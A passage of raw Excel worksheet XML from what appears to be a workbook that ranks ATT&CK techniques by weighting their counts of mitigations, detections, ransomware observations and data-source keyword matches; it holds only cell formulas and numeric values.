      <c r="AI499" s="25">
        <f>IF(AH499="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ499" s="25" t="str" cm="1">
        <f t="array" ref="AJ499">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC499)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK499" s="25">
        <f>IF(AJ499="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL499" s="25" t="str" cm="1">
        <f t="array" ref="AL499">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC499)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM499" s="25">
        <f>IF(AL499="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN499" s="51"/>
      <c r="AO499" s="51"/>
      <c r="AP499" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1320000000000002E-2</v>
      </c>
      <c r="AQ499" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AR499" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AS499" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT499" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU49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00" spans="1:47" ht="32.1">
      <c r="A500" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="B500" s="25">
        <f>SUM(H500,M500,V500)*(1+SUM(AE500,AG500,AI500,AK500,AM500))</f>
        <v>0.13300000000000001</v>
      </c>
      <c r="C500" s="25" t="s">
        <v>1796</v>
      </c>
      <c r="D500" s="25" t="s">
        <v>99</v>
      </c>
      <c r="E500" s="25" t="s">
        <v>1797</v>
      </c>
      <c r="F500" s="51">
        <v>1</v>
      </c>
      <c r="G500" s="51">
        <v>1</v>
      </c>
      <c r="H500" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I500">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J500">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K500">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L500">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M500" s="25">
        <v>0</v>
      </c>
      <c r="N500" s="51">
        <v>0</v>
      </c>
      <c r="O500" s="51">
        <v>0</v>
      </c>
      <c r="P500" s="51">
        <v>0</v>
      </c>
      <c r="Q500" s="51">
        <v>0</v>
      </c>
      <c r="R500" s="51"/>
      <c r="S500" s="51">
        <v>0</v>
      </c>
      <c r="T500" s="52" t="s">
        <v>1798</v>
      </c>
      <c r="U500" s="51">
        <v>0</v>
      </c>
      <c r="V500" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W500">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X500">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y500">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z500">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA500">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB500">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC500" s="29" t="s">
        <v>1799</v>
      </c>
      <c r="AD500" s="25" t="str" cm="1">
        <f t="array" ref="AD500">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC500)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE500" s="25">
        <f>IF(AD500="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF500" s="25" t="str" cm="1">
        <f t="array" ref="AF500">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC500)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG500" s="25">
        <f>IF(AF500="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH500" s="25" t="str" cm="1">
        <f t="array" ref="AH500">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC500)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI500" s="25">
        <f>IF(AH500="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ500" s="25" t="str" cm="1">
        <f t="array" ref="AJ500">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC500)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK500" s="25">
        <f>IF(AJ500="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL500" s="25" t="str" cm="1">
        <f t="array" ref="AL500">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC500)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM500" s="25">
        <f>IF(AL500="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN500" s="52">
        <v>0</v>
      </c>
      <c r="AO500" s="51">
        <v>0</v>
      </c>
      <c r="AP500" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="AQ500" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AR500" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AS500" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT500" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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01" spans="1:47" ht="63.95">
      <c r="A501" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="B501" s="25">
        <f>SUM(H501,M501,V501)*(1+SUM(AE501,AG501,AI501,AK501,AM501))</f>
        <v>0.13300000000000001</v>
      </c>
      <c r="C501" s="25" t="s">
        <v>1800</v>
      </c>
      <c r="D501" s="25" t="s">
        <v>1354</v>
      </c>
      <c r="E501" s="25" t="s">
        <v>1801</v>
      </c>
      <c r="F501" s="51">
        <v>1</v>
      </c>
      <c r="G501" s="51">
        <v>1</v>
      </c>
      <c r="H501" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I501">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J501">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K501">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L501">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M501" s="25">
        <v>0</v>
      </c>
      <c r="N501" s="51">
        <v>0</v>
      </c>
      <c r="O501" s="51">
        <v>0</v>
      </c>
      <c r="P501" s="51">
        <v>0</v>
      </c>
      <c r="Q501" s="51">
        <v>0</v>
      </c>
      <c r="R501" s="51"/>
      <c r="S501" s="51">
        <v>0</v>
      </c>
      <c r="T501" s="51"/>
      <c r="U501" s="51">
        <v>0</v>
      </c>
      <c r="V501" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W501">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X501">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y501">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z501">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA501">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB501">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC501" s="29" t="s">
        <v>1802</v>
      </c>
      <c r="AD501" s="25" t="str" cm="1">
        <f t="array" ref="AD501">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC501)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE501" s="25">
        <f>IF(AD501="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF501" s="25" t="str" cm="1">
        <f t="array" ref="AF501">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC501)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG501" s="25">
        <f>IF(AF501="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH501" s="25" t="str" cm="1">
        <f t="array" ref="AH501">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC501)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI501" s="25">
        <f>IF(AH501="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ501" s="25" t="str" cm="1">
        <f t="array" ref="AJ501">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC501)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK501" s="25">
        <f>IF(AJ501="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL501" s="25" t="str" cm="1">
        <f t="array" ref="AL501">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC501)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM501" s="25">
        <f>IF(AL501="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN501" s="52">
        <v>0</v>
      </c>
      <c r="AO501" s="51">
        <v>0</v>
      </c>
      <c r="AP501" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="AQ501" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AR501" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AS501" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT501" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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02" spans="1:47" ht="32.1">
      <c r="A502" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="B502" s="25">
        <f>SUM(H502,M502,V502)*(1+SUM(AE502,AG502,AI502,AK502,AM502))</f>
        <v>0.13300000000000001</v>
      </c>
      <c r="C502" s="25" t="s">
        <v>1803</v>
      </c>
      <c r="D502" s="25" t="s">
        <v>1354</v>
      </c>
      <c r="E502" s="25" t="s">
        <v>1804</v>
      </c>
      <c r="F502" s="51">
        <v>1</v>
      </c>
      <c r="G502" s="51">
        <v>1</v>
      </c>
      <c r="H502" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I502">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J502">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K502">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L502">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M502" s="25">
        <v>0</v>
      </c>
      <c r="N502" s="51">
        <v>0</v>
      </c>
      <c r="O502" s="51">
        <v>0</v>
      </c>
      <c r="P502" s="51">
        <v>0</v>
      </c>
      <c r="Q502" s="51">
        <v>0</v>
      </c>
      <c r="R502" s="51"/>
      <c r="S502" s="51">
        <v>0</v>
      </c>
      <c r="T502" s="51"/>
      <c r="U502" s="51">
        <v>0</v>
      </c>
      <c r="V502" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W502">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X502">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y502">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z502">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA502">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB502">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC502" s="29" t="s">
        <v>1805</v>
      </c>
      <c r="AD502" s="25" t="str" cm="1">
        <f t="array" ref="AD502">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC502)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE502" s="25">
        <f>IF(AD502="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF502" s="25" t="str" cm="1">
        <f t="array" ref="AF502">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC502)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG502" s="25">
        <f>IF(AF502="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH502" s="25" t="str" cm="1">
        <f t="array" ref="AH502">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC502)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI502" s="25">
        <f>IF(AH502="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ502" s="25" t="str" cm="1">
        <f t="array" ref="AJ502">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC502)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK502" s="25">
        <f>IF(AJ502="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL502" s="25" t="str" cm="1">
        <f t="array" ref="AL502">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC502)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM502" s="25">
        <f>IF(AL502="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN502" s="52">
        <v>0</v>
      </c>
      <c r="AO502" s="51">
        <v>0</v>
      </c>
      <c r="AP502" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="AQ502" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AR502" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AS502" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT502" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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03" spans="1:47">
      <c r="A503" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="B503" s="25">
        <f>SUM(H503,M503,V503)*(1+SUM(AE503,AG503,AI503,AK503,AM503))</f>
        <v>0.1</v>
      </c>
      <c r="C503" s="25" t="s">
        <v>1806</v>
      </c>
      <c r="D503" s="25" t="s">
        <v>245</v>
      </c>
      <c r="E503" s="25" t="s">
        <v>1807</v>
      </c>
      <c r="F503" s="51">
        <v>1</v>
      </c>
      <c r="G503" s="51">
        <v>1</v>
      </c>
      <c r="H503" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I503">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J503">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K503">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L503">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M503" s="25">
        <v>0</v>
      </c>
      <c r="N503" s="51">
        <v>0</v>
      </c>
      <c r="O503" s="51">
        <v>0</v>
      </c>
      <c r="P503" s="51">
        <v>0</v>
      </c>
      <c r="Q503" s="51">
        <v>0</v>
      </c>
      <c r="R503" s="51"/>
      <c r="S503" s="51">
        <v>0</v>
      </c>
      <c r="T503" s="51"/>
      <c r="U503" s="51">
        <v>0</v>
      </c>
      <c r="V503" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W503">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X503">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y503">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z503">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA503">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB503">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC503" s="29" t="s">
        <v>1808</v>
      </c>
      <c r="AD503" s="25" t="str" cm="1">
        <f t="array" ref="AD503">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC503)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE503" s="25">
        <f>IF(AD503="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF503" s="25" t="str" cm="1">
        <f t="array" ref="AF503">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC503)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG503" s="25">
        <f>IF(AF503="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH503" s="25" t="str" cm="1">
        <f t="array" ref="AH503">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC503)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI503" s="25">
        <f>IF(AH503="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ503" s="25" t="str" cm="1">
        <f t="array" ref="AJ503">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC503)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK503" s="25">
        <f>IF(AJ503="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL503" s="25" t="str" cm="1">
        <f t="array" ref="AL503">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC503)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM503" s="25">
        <f>IF(AL503="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN503" s="60">
        <v>0</v>
      </c>
      <c r="AO503" s="51">
        <v>0</v>
      </c>
      <c r="AP503" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="AQ503" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AR503" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AS503" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT503" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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04" spans="1:47">
      <c r="A504" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="B504" s="25">
        <f>SUM(H504,M504,V504)*(1+SUM(AE504,AG504,AI504,AK504,AM504))</f>
        <v>0.1</v>
      </c>
      <c r="C504" s="25" t="s">
        <v>1809</v>
      </c>
